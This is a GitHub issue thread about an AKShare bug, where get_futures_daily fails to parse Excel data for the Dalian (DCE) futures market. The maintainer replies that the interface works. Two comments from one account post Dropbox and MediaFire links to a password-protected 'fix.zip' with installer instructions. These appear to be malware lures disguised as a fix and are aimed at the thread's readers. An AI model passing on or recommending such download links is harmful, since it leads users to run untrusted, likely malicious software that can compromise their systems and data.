### ISSUE TITLE
AKShare 接口问题报告：get_futures_daily 无法获取"DCE"市场数据

### ISSUE THREAD

**Issue by Zeuscom** [akfamily/akshare#5148]
> 欢迎加入《数据科学实战》知识星球，交流财经数据与量化投资相关内容，
> 详细信息参考：https://akshare.akfamily.xyz/learn.html

## 前提

遇到任何问题，请先将您的 AKShare 版本升级到**最新版**，可以通过如下命令升级：

```
pip install akshare --upgrade  # Python 版本需要大于等于 3.8
```

## 如何提交问题

提交问题的同时，请提交以下相关信息，以更精准的解决问题。

**不符合提交规范的 issues 会被关闭！**

**详细问题描述**

1. 请先详细阅读文档对应接口的使用方式：https://akshare.akfamily.xyz
2. 操作系统版本，目前只支持 64 位操作系统
3. Python 版本，目前只支持 3.8 以上的版本
4. AKShare 版本，请升级到最新版
5. 接口的名称和相应的调用代码
6. 接口报错的截图或描述
7. 期望获得的正确结果

python版本： 3.12.1， Windows系统64位，akshare版本 1.14.64
接口：ak.get_futures_daily
代码：
import akshare as ak
import pandas as pd
import numpy as np

start_date = "20130801"
end_date = "20140821"
market="DCE"
get_futures_daily_df = ak.get_futures_daily(start_date=start_date, end_date=end_date, market=market)

报错描述：
在调用 ak.get_futures_daily 接口获取历史数据时，DCE市场的数据会因无法解析excel而报错，其他市场可以正常获取数据形成表

报错截图：
![问题](https://github.com/user-attachments/assets/f16907d9-783e-4df6-8714-0a6de2033766)

期望回报：
能够像其他交易所一样获取历史数据

**Comment by Wanderx13** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by Wanderx13** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by albertandking** [comment]
> > 欢迎加入《数据科学实战》知识星球，交流财经数据与量化投资相关内容，
> > 详细信息参考：https://akshare.akfamily.xyz/learn.html
> 
> ## 前提
> 遇到任何问题，请先将您的 AKShare 版本升级到**最新版**，可以通过如下命令升级：
> 
> ```
> pip install akshare --upgrade  # Python 版本需要大于等于 3.8
> ```
> 
> ## 如何提交问题
> 提交问题的同时，请提交以下相关信息，以更精准的解决问题。
> 
> **不符合提交规范的 issues 会被关闭！**
> 
> **详细问题描述**
> 
> 1. 请先详细阅读文档对应接口的使用方式：https://akshare.akfamily.xyz
> 2. 操作系统版本，目前只支持 64 位操作系统
> 3. Python 版本，目前只支持 3.8 以上的版本
> 4. AKShare 版本，请升级到最新版
> 5. 接口的名称和相应的调用代码
> 6. 接口报错的截图或描述
> 7. 期望获得的正确结果
> 
> python版本： 3.12.1， Windows系统64位，akshare版本 1.14.64 接口：ak.get_futures_daily 代码： import akshare as ak import pandas as pd import numpy as np
> 
> start_date = "20130801" end_date = "20140821" market="DCE" get_futures_daily_df = ak.get_futures_daily(start_date=start_date, end_date=end_date, market=market)
> 
> 报错描述： 在调用 ak.get_futures_daily 接口获取历史数据时，DCE市场的数据会因无法解析excel而报错，其他市场可以正常获取数据形成表
> 
> 报错截图： ![问题](https://private-user-images.githubusercontent.com/42051583/361284118-f16907d9-783e-4df6-8714-0a6de2033766.PNG?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MjQ2NTMxMzQsIm5iZiI6MTcyNDY1MjgzNCwicGF0aCI6Ii80MjA1MTU4My8zNjEyODQxMTgtZjE2OTA3ZDktNzgzZS00ZGY2LTg3MTQtMGE2ZGUyMDMzNzY2LlBORz9YLUFtei1BbGdvcml0aG09QVdTNC1ITUFDLVNIQTI1NiZYLUFtei1DcmVkZW50aWFsPUFLSUFWQ09EWUxTQTUzUFFLNFpBJTJGMjAyNDA4MjYlMkZ1cy1lYXN0LTElMkZzMyUyRmF3czRfcmVxdWVzdCZYLUFtei1EYXRlPTIwMjQwODI2VDA2MTM1NFomWC1BbXotRXhwaXJlcz0zMDAmWC1BbXotU2lnbmF0dXJlPTIxNDViY2NiYzdjZTEyMWQ1ZDFlNjVlNGU1MjFiZmY2MjFhZWQ4OTkyZjA5NmE3ODM2Mjg0ODUxMzliYzU2NzYmWC1BbXotU2lnbmVkSGVhZGVycz1ob3N0JmFjdG9yX2lkPTAma2V5X2lkPTAmcmVwb19pZD0wIn0.pDcFGHwoVzFN9oqiCrQpQ1Z_UWsG3ApRbBUnkwG2hAA)
> 
> 期望回报： 能够像其他交易所一样获取历史数据

接口测试正常，请注意调用接口的频率
